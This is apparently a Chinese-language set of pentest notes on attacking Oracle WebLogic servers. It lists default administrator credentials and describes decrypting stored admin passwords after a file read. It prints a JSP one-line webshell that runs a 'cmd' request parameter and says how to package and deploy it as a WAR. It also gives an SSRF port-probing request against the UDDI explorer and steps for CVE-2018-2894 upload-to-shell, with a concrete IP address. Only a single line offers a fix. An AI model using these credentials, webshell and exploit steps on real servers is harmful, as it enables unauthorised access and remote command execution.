弱口令

User ID	system
Password password
Level Administrator

User ID weblogic
Password weblogic
Level Administrator

User ID weblogic
Password weblogic

User ID admin
Password security

User ID joe
Password password

User ID mary
Password password

User ID system
Password security

User ID wlcsystem
Password wlcsystem

User ID wlpisystem
Password wlpisystem

任意文件读取基础上的后台密码破解

假设我们能前台任意文件读取,但是后台的账户密码是加密的.如何破解
weblogic新版本用的是AES加密,老版本用的是3DES加密
都是对称加密,有密钥就可解

QQ截图20210219152611

假设前台可以任意文件读取,那么我们只要用到用户的密文和加密的密钥即可破解。这两个文件在base_domain下, 为./security/SerializedSystemIni.datconfig/config.xml
这里值得一提的是,.dat文件是二进制文件,建议burp打开不然容易乱码

QQ截图20210219152627

把二进制信息copy to file保存下来.

QQ截图20210219152644

获取config.xml

QQ截图20210219152706

xml文档里这才是管理员账户
开始解密,这里使用的是 https://github.com/TideSec/Decrypt_Weblogic_Password 中的tools5

QQ截图20210219152715

解密成功。登录就完事了

后台传木马提权

后台传jsp木马的war包就行了
怎么生成war包:
jar cvf shell.war 木马源文件

部署-》安装-》上载文件-》选择文件选择war包-》一直下一步然后完成

QQ截图20210219152726

访问war包目录下的木马文件即可

QQ截图20210219152737

马子是一句话马子 <%Runtime.getRuntime.exec(request.getParameter(“cmd”));%>
命令建议用这个网站编码一下,不然有可能不会执行 http://www.jackson-t.ca/runtime-exec-payloads.html

weblogic uudi组件造成的端口探测

若weblogic加载了uudi组件,那么在 /uddiexplorer/SearchPublicRegistries.jsp 会存在端口探测问题

对该jsp传参

?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001   

我们通过改变operator的端口发包,看页面变化即可端口探测

QQ截图20210219152757

端口不存在,就会有could not connect over HTTP to server:

QQ截图20210219152808

存在就有404 error code (Not Found). Please ensure that your URL is correct,

QQ截图20210219152816

Weblogic 任意文件上传漏洞(CVE-2018-2894)

WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do

影响版本 Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。

前提条件:管理员在后台 ->base_domain->配置->一般信息->高级,把这个勾选了

QQ截图20210219152829

开启后我们来到 http://ip:port/ws_utc/config.do ,把这个改为
路径 /user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

QQ截图20210219152840

然后点安全,再点添加,把我们的jsp马传上去

QQ截图20210219152904

QQ截图20210219152915

抓包,获取该木马的时间戳

QQ截图20210219152940

访问
http://123.57.137.109:7001/ws_utc/css/config/keystore/时间戳_文件名

QQ截图20210219152951

成功访问我的马儿
修复: 设置Config.do、begin.do页面登录授权后访问 ,升级,加waf